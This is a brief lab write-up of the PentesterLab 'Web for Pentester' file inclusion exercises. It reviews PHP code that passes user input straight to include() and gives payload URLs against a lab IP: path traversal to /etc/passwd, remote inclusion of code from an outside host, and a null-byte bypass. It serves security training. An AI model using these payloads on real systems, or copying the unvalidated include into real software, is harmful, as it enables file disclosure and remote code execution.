Pentestlab-Web for Pentester - File Include

Web for Pentester: This exercise is a set of the most common web vulnerability

Difficluty: 1/5

OWASP: The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a “dynamic file inclusion” mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.

Tool: ZAP

Example 1

code review:

example1.php
1
2
3
4

if ($_GET["page"]) {
  include($_GET["page"]);

}

The developer uses include function in the code. However, there is no filter to protect file include attack. Use firebug to find the variable name is page, then do exploit:

http://192.168.79.162/fileincl/example1.php?page=../../../../../../etc/passwd

Also pentesterlab provide a online code https://pentesterlab.com/test_include.txt

http://192.168.79.162/fileincl/example1.php?page=https://pentesterlab.com/test_include.txt

Example 2

code review:

example2.php
1
2
3
4
5
6
7

if ($_GET["page"]) {
$file = $_GET["page"].".php";
// simulate null byte issue
$file = preg_replace('/\x00.*/',"",$file);
  include($file);

}

There is a null issue. he null byte character effectively tells the filesystem to ignore anything that comes after it. When the path is resolved by the filesystem

so I can do:

http://192.168.79.162/fileincl/example2.php?page=https://pentesterlab.com/test_include.txt%00

file include, pentesterlab, web pentest